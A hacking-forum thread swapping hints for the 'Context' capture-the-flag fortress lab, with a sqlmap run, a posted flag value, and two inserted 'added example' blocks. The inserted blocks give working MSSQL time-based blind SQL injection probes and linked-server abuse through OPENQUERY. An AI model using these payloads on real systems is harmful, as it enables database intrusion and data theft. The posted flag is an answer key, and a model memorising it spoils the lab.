TUTORIAL CONTEXT fortress
by sh00t - November 16, 2020 at 03:31 PM
#13
(November 16, 2020 at 03:31 PM)sh00t Wrote: 1. Look at the source code on the staff page.
2. SQLi after login in the "&certified=1" parameter; db=mssql, type=blind time-based.
3. Log in to the emails using the password from step 1; switch between the emails from the staff page to find the flag and the info to go further.

What are the login username and password?
Please help.
#14
Any help on the 5th flag? I can't find the credentials in the logs.
#15
(December 03, 2020 at 10:33 AM)sh00t Wrote:
(December 01, 2020 at 04:22 AM)esh_din1 Wrote: Any updates on the 4th, 5th, 6th and 7th flags?

4. Add 'Profile=serialized' to the cookie and get a shell; the flag is in C:\Users\Public\flag.txt

5. After the shell, look for creds in the log and use them to log in to the db, then extract the flag from the linked server there.

If you find out about 6 and 7, don't forget me, mate.

I guess I'm stuck on what to do with the cookie and how to get the shell. Are we talking an os-shell through sqlmap? Totally lost and need some help.
#16
(December 01, 2020 at 04:22 AM)esh_din1 Wrote: Any updates on the 4th, 5th, 6th and 7th flags?


Can you please be more specific? I am trying to put Profile=<serialized payload generated with ysoserial> but am unable to get anything back. I tried almost all the CommonsCollections payloads in ysoserial, but they did not work for me.
#17
sudo sqlmap -r request.txt --random-agent --force-ssl --technique=T --dbms=mssql --dbs

[11:40:14] [WARNING] heuristic (basic) test shows that POST parameter 'certified' might not be injectable
[11:40:15] [INFO] testing for SQL injection on POST parameter 'certified'
[11:40:15] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[11:40:22] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[11:40:28] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[11:40:35] [INFO] testing 'Oracle AND time-based blind'
[11:40:42] [WARNING] POST parameter 'certified' does not seem to be injectable


Any solution?
Or please, could someone share with us the second flag and the credentials to pass to the next step?
I would be grateful if someone could send me this information.
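Before trusting a "does not seem to be injectable" verdict from a time-based run, it is worth sending the probes by hand and timing them, because sqlmap only finds an injection whose boundaries match one of its prefix/suffix guesses. The following is an added example, not code from the thread or from sqlmap: the generic MSSQL conditional-delay shape that a `--technique=T --dbms=mssql` run relies on. The surrounding query, the numeric context of `certified`, the `;` statement separator and the `--` terminator are assumptions and have to be adapted to the real request.

```sql
-- Added example (not from the thread): manual MSSQL time-based blind probes
-- for a value that lands in a numeric context, such as certified=1.
-- Assumptions: stacked queries are allowed, ';' separates statements and '--'
-- comments out the rest of the original query. Adjust to the real request.

-- Probe A, condition true: the response should stall for about 5 seconds.
1; IF (1=1) WAITFOR DELAY '0:0:5'--

-- Probe B, condition false: the response must come back immediately.
-- If both probes stall, the delay is the application or the network, not
-- the injection; if neither stalls, the statement never reached the DB.
1; IF (1=2) WAITFOR DELAY '0:0:5'--

-- Once A and B behave differently, extract one bit per request. This probe
-- asks whether the first character of the current database name sorts
-- above 'm' (ASCII 109); a binary search over 1..127 finds each character
-- in about seven requests. Swap DB_NAME() for SYSTEM_USER, @@VERSION or a
-- scalar subquery to read other values the same way.
1; IF (ASCII(SUBSTRING(DB_NAME(),1,1)) > 109) WAITFOR DELAY '0:0:5'--

-- Sanity check of the signal itself, run directly on any MSSQL instance
-- (not injected): the delay is only usable when it is clearly longer than
-- the server's normal response jitter, which is why 5 s beats 1 s over a VPN.
DECLARE @t0 DATETIME2 = SYSDATETIME();
IF (1=1) WAITFOR DELAY '0:0:5';
SELECT DATEDIFF(MILLISECOND, @t0, SYSDATETIME()) AS elapsed_ms;
```

Send each probe several times and compare the spread of response times for A against B rather than a single sample; one slow request from a busy target looks exactly like a true branch.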
#18
You have to delete the parameter "--technique" ;)


(January 12, 2021 at 12:50 PM)dafdo Wrote: sudo sqlmap -r request.txt --random-agent --force-ssl --technique=T --dbms=mssql --dbs [...]
#19
Yes, I deleted this option, but still the same problem: "no result".
If anyone can help me, just DM me on Discord: dafdo # 0154
(January 12, 2021 at 10:45 PM)odinenet Wrote: You have to delete the parameter "--technique" ;)
#20
Yes, please, if someone can share flag 2; I'm stuck.
#21
(November 16, 2020 at 03:31 PM)sh00t Wrote: 1. Look at the source code on the staff page [...]
Any clear idea for the third flag? Because the database usernames and passwords are not working for OWA.
#22
CONTEXT{s3cur1ty_thr0ugh_0bscur1ty}

Anyone who has flag 2/3, please post.
#23
It seems the 6th flag is running a CLR assembly in the web\clients db https://blog.netspi.com/attacking-sql-se...ssemblies/ .. I have not done it yet, but maybe this will help others.
#24
karl.memaybe can run BackupClients on the linked server
select name,
has_perms_by_name(name, 'OBJECT', 'EXECUTE') as has_execute,
has_perms_by_name(name, 'OBJECT', 'VIEW DEFINITION') as has_view_definition
from [WEB\CLIENTS].clients.sys.procedures

But the linked server has RPC disabled and I can't log in to the WEB\CLIENTS db. I only got sqsh to work with the WEB\DB MSSQL server; no other client will connect with karl's creds. Any hints?
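The permission query above has a catch, and the RPC problem has a workaround that does not need a direct login to WEB\CLIENTS. The following is an added example, not code from the post: it runs from the WEB\DB server the poster can already reach with sqsh. The linked-server and object names ([WEB\CLIENTS], clients, BackupClients) are taken from the post; the dbo schema for BackupClients is an assumption.

```sql
-- Added example (not from the thread). Run on the server you can reach
-- (WEB\DB in the post); [WEB\CLIENTS], clients and BackupClients come from
-- the post, the dbo schema is an assumption.

-- 1. Enumerate linked servers and see which operations each one allows.
--    Four-part-name EXEC and EXEC ... AT need is_rpc_out_enabled = 1;
--    OPENQUERY only needs is_data_access_enabled = 1.
SELECT name, product, provider, data_source,
       is_rpc_out_enabled, is_data_access_enabled
FROM sys.servers
WHERE is_linked = 1;

-- 2. Caveat on the query in the post: HAS_PERMS_BY_NAME is a local built-in,
--    evaluated on the local server against local objects, even when the
--    names were fetched through a four-part name. For a procedure that only
--    exists on the remote side it returns NULL (no such local object), not
--    the remote EXECUTE right. Ask the remote server instead; the answer is
--    for whatever login the linked server maps you to, which may differ
--    from karl.
SELECT * FROM OPENQUERY([WEB\CLIENTS], '
    SELECT SYSTEM_USER AS remote_login,
           DB_NAME()   AS remote_db,
           IS_SRVROLEMEMBER(''sysadmin'') AS remote_sysadmin');

SELECT * FROM OPENQUERY([WEB\CLIENTS], '
    SELECT p.name,
           HAS_PERMS_BY_NAME(''clients.'' + SCHEMA_NAME(p.schema_id) + ''.'' + p.name,
                             ''OBJECT'', ''EXECUTE'') AS has_execute
    FROM clients.sys.procedures AS p');

-- 3. OPENQUERY uses data access, not RPC, so it keeps working while RPC Out
--    is off. It expects a row-returning statement; a procedure that returns
--    a result set can usually be invoked through it this way.
SELECT * FROM OPENQUERY([WEB\CLIENTS], 'EXEC clients.dbo.BackupClients');

-- 4. These two forms need RPC Out and are what fails while it is disabled.
EXEC [WEB\CLIENTS].clients.dbo.BackupClients;
EXEC ('EXEC clients.dbo.BackupClients') AT [WEB\CLIENTS];

-- 5. Turning RPC Out on is a server-level change on WEB\DB (ALTER ANY LINKED
--    SERVER or sysadmin there); only an option if you already hold that.
-- EXEC sp_serveroption @server = 'WEB\CLIENTS', @optname = 'rpc out', @optvalue = 'true';
```

Step 2 is the one to run first: if the mapped remote login is not karl, the EXECUTE result in the post's query is answering a different question than the one being asked.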
